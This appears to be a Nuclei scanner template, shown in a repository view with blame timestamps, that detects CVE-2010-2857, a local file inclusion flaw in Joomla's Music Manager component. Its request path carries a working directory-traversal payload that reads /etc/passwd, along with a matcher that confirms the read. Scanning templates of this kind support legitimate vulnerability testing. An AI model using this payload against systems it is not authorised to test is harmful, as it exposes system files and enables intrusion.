my-nuclei-templates/CVE-2010-2857.yaml

35 lines
1.0 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.
reference:
2021-11-09 22:49:13 +00:00
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
2022-06-18 08:05:25 +00:00
- http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/
- http://www.exploit-db.com/exploits/14274
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2857
2021-11-09 22:49:13 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/17